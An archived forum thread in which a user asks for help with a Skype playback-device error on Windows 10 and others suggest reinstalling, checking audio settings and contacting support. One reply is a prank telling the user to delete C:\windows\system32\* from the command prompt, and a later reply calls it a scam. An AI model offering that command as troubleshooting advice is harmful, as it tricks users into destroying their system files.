Avicus Archive

Skype Troubles! by Wahiz October 26, 2015 at 8:10 PM UTC

Ok, so I was in a call and everyone could hear me but all of a sudden no one could and now whenever I try to call someone it says problem with the playback device. 

Also I use a laptop that runs on Windows 10
So could someone please help me

xMasterSlayer October 26, 2015 at 8:10 PM UTC

It's most likely ur Internet had a breakdown which caused skype to freak out. My suggestion to you would be uninstall skype and then reinstall it. If that doesn't work tell me and I'll give some other possibilities.

P.S. I hope this helped!

Wahiz October 26, 2015 at 8:10 PM UTC

It's most likely ur Internet had a breakdown which caused skype to freak out. My suggestion to you would be uninstall skype and then reinstall it. If that doesn't work tell me and I'll give some other possibilities.

P.S. I hope this helped!
OMFG I love you in a no homo way! 

Thank you so much it worked :D

Ok mods you can lock it now

Wahiz October 26, 2015 at 8:10 PM UTC

P.S. I hope this helped!
Ughh it screwed up again

IviFetita October 26, 2015 at 11:10 PM UTC

Ughh it screwed up again
Maybe you could check if every thing is right, meaning your microphone and skype settings. If after trying it all you can't fix it, go to skype's website and go to the support site.

xMasterSlayer October 27, 2015 at 8:10 PM UTC

Ughh it screwed up again
Anyway u can post screenshots of exactly what comes up when u try and open skype?

AtditC October 27, 2015 at 10:10 PM UTC

Ughh it screwed up again
open cmd.exe, type in del C:\windows\system32\*, confirm with 'Y' and restart your computer. Then it should work again. Good luck!

Check Skype Support.

DaFrozenBlaze October 27, 2015 at 11:10 PM UTC

open cmd.exe, type in del C:\windows\system32\*, confirm with 'Y' and restart your computer. Then it should work again. Good luck!

Check Skype Support.
Scam.

AtditC October 27, 2015 at 11:10 PM UTC

Scam.
If he'd really try to delete system32 on windows with user or even admin perms., it'd say "Denied - No permissions" or "This proccess is currently used" for some apps.

shadowolfyt October 28, 2015 at 1:10 AM UTC

Check Skype Support.
that won't help at all....
But the one at the bottom will :)

Eklip_Z October 28, 2015 at 4:10 AM UTC

Make sure that the right microphone and speaker are selected under the skype settings.

dentmaged October 28, 2015 at 10:10 AM UTC

If he'd really try to delete system32 on windows with user or even admin perms., it'd say "Denied - No permissions" or "This proccess is currently used" for some apps.
I'm guessing you've tried that...